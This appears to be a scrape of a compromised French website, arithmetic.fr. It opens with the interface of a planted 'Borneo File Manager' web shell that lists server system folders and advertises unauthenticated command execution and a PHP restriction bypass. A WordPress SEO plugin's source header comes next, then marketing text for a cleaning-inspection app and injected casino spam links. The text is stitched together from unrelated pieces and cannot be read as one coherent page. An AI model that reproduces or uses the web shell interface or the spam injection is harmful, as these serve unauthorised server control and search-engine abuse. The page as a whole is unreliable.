Borneo File Manager
File Manager v1.0
Linux 5.4.0-216-generic arithmetic.fr No Auth
Features
Scanner
Tools
arithmetic.fr@vps-1cfacc52 $
Exec: Available | Bypass: UAF PHP 8.1 | Disabled: None
Name Type Size Permission Actions
X11 Folder 0755
accountsservice Folder 0755
apache2 Folder 0755
apparmor Folder 0755
apt Folder 0755
binfmt.d Folder 0755
byobu Folder 0755
cgi-bin Folder 0755
chromium-browser Folder 0755
cloud-init Folder 0755
console-setup Folder 0755
cryptsetup Folder 0755
dbus-1.0 Folder 0755
dpkg Folder 0755
dracut Folder 0755
eject Folder 0755
environment.d Folder 0755
file Folder 0755
finalrd Folder 0755
gcc Folder 0755
girepository-1.0 Folder 0755
git-core Folder 0755
gnupg Folder 0755
gnupg2 Folder 0755
groff Folder 0755
grub Folder 0755
grub-legacy Folder 0755
hdparm Folder 0755
init Folder 0755
initcpio Folder 0755
initramfs-tools Folder 0755
kernel Folder 0755
klibc Folder 0755
language-selector Folder 0755
linux Folder 0755
linux-boot-probes Folder 0755
locale Folder 0755
lsb Folder 0755
man-db Folder 0755
mecab Folder 0755
mime Folder 0755
modprobe.d Folder 0755
modules Folder 0755
modules-load.d Folder 0755
multipath Folder 0755
mysql Folder 0755
nagios Folder 0755
netplan Folder 0755
networkd-dispatcher Folder 0755
nginx Folder 0755
node_modules Folder 0755
ntp Folder 0755
open-iscsi Folder 0755
open-vm-tools Folder 0755
openssh Folder 0755
os-prober Folder 0755
os-probes Folder 0755
packagekit Folder 0755
php Folder 0755
pkgconfig Folder 0755
pm-utils Folder 0755
policykit-1 Folder 0755
postfix Folder 0755
python2.7 Folder 0755
python3 Folder 0755
python3.8 Folder 0755
python3.9 Folder 0755
recovery-mode Folder 0755
rsyslog Folder 0755
sasl2 Folder 0755
shim Folder 0755
snapd Folder 0755
software-properties Folder 0755
ssl Folder 0755
sudo Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
sysusers.d Folder 0755
tc Folder 0755
terminfo Folder 0755
tmpfiles.d Folder 0755
ubuntu-advantage Folder 0755
ubuntu-release-upgrader Folder 0755
udev Folder 0755
udisks2 Folder 0755
ufw Folder 0755
update-notifier Folder 0755
valgrind Folder 0755
x86_64-linux-gnu Folder 0755
xfsprogs Folder 0755
cnf-update-db File 739 B 0755
command-not-found File 3.48 KB 0755
cpp File 1.1 MB 0755
klibc-zqGeWFMIYUjZUbUCGjBo3LnHoMg.so File 76.94 KB 0755
libdmmp.so File 34.07 KB 0644
libdmmp.so.0.2.0 File 34.07 KB 0644
libgcc_s.so.1 File 102.52 KB 0644
libhandle.so.1 File 14.23 KB 0644
libhandle.so.1.0.3 File 14.23 KB 0644
libmpathcmd.so File 13.99 KB 0644
libmpathcmd.so.0 File 13.99 KB 0644
libmpathpersist.so File 33.99 KB 0644
libmpathpersist.so.0 File 33.99 KB 0644
libmultipath.so File 375.83 KB 0644
libmultipath.so.0 File 375.83 KB 0644
os-release File 382 B 0644
sendmail File 34.3 KB 0755
sftp-server File 126.28 KB 0755
* Plugin Name: All in One SEO * Plugin URI: https://aioseo.com/ * Description: SEO for WordPress. Features like XML Sitemaps, SEO for custom post types, SEO for blogs, business sites, ecommerce sites, and much more. More than 100 million downloads since 2007. * Author: All in One SEO Team * Author URI: https://aioseo.com/ * Version: 4.9.10 * Text Domain: all-in-one-seo-pack * Domain Path: /languages * License: GPL-3.0+ * * All in One SEO is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * any later version. * * All in One SEO is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with AIOSEO. If not, see . * * @since 4.0.0 * @author All in One SEO Team * @package AIOSEO\Plugin * @license GPL-3.0+ * @copyright Copyright © 2025, All in One SEO */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } require_once dirname( __FILE__ ) . '/app/init/init.php'; // Check if this plugin should be disabled. if ( aioseoMaybePluginIsDisabled( __FILE__ ) ) { return; } if ( ! defined( 'AIOSEO_PHP_VERSION_DIR' ) ) { define( 'AIOSEO_PHP_VERSION_DIR', basename( dirname( __FILE__ ) ) ); } require_once dirname( __FILE__ ) . '/app/init/notices.php'; require_once dirname( __FILE__ ) . '/app/init/activation.php'; // We require PHP 7.1 or higher for the whole plugin to work. if ( version_compare( PHP_VERSION, '7.1', '<' ) ) { add_action( 'admin_notices', 'aioseo_php_notice' ); // Do not process the plugin code further. return; } // We require WordPress 5.7 or higher for the whole plugin to work. global $wp_version; // phpcs:ignore Squiz.NamingConventions.ValidVariableName if ( version_compare( $wp_version, '5.7', '<' ) ) { // phpcs:ignore Squiz.NamingConventions.ValidVariableName add_action( 'admin_notices', 'aioseo_wordpress_notice' ); // Do not process the plugin code further. return; } if ( ! defined( 'AIOSEO_DIR' ) ) { define( 'AIOSEO_DIR', __DIR__ ); } if ( ! defined( 'AIOSEO_FILE' ) ) { define( 'AIOSEO_FILE', __FILE__ ); } // Don't allow multiple versions to be active. if ( function_exists( 'aioseo' ) ) { add_action( 'activate_all-in-one-seo-pack/all_in_one_seo_pack.php', 'aioseo_lite_just_activated' ); add_action( 'deactivate_all-in-one-seo-pack/all_in_one_seo_pack.php', 'aioseo_lite_just_deactivated' ); add_action( 'activate_all-in-one-seo-pack-pro/all_in_one_seo_pack.php', 'aioseo_pro_just_activated' ); add_action( 'admin_notices', 'aioseo_lite_notice' ); // Do not process the plugin code further. return; } // We will be deprecating these versions of PHP in the future, so we'll let the user know. // We flag deprecated WP versions in the DeprecatedWordPress class. if ( version_compare( PHP_VERSION, '7.4', '<' ) ) { add_action( 'admin_notices', 'aioseo_php_notice_deprecated' ); } // Define the class and the function. // The AIOSEOAbstract class is required here because it can't be autoloaded. require_once dirname( __FILE__ ) . '/app/AIOSEOAbstract.php'; require_once dirname( __FILE__ ) . '/app/AIOSEO.php'; aioseo(); Arithmetic

Caractéristiques générales

Ce que nous proposons

Une application dédiée à l’entretien ménager des parties communes
Une interface agile et intuitive
Une totale maîtrise des informations collectées
Un contenu personnalisable
Une traçabilité maîtrisée
Des reportings réguliers et spécifiques

Dashboard

3 étapes clés pour améliorer la qualité de service :

  • 01

    Connectez-vous à l'application en profitant de ses nombreuses fonctionnalités

  • 02

    Analysez vos résultats avec une interface web personnalisée

  • 03

    Améliorez la propreté des parties communes

les app arithmetic

Des solutions adaptées à vos besoins

Ari est à votre service et vous souhaite la bienvenue dans l’univers du Digital Analytics Process

les solutions arithmetic

En quelques chiffres

Logements

4,8 / 5

Sur les plateformes
de téléchargement

Contrôles qualité réalisé

Nombre de contrôles préventifs réalisés

Témoignages

Ce qu'en pensent nos clients

https://nvcasino-serbia.com/
AMPM Casino
Casino Infinity

x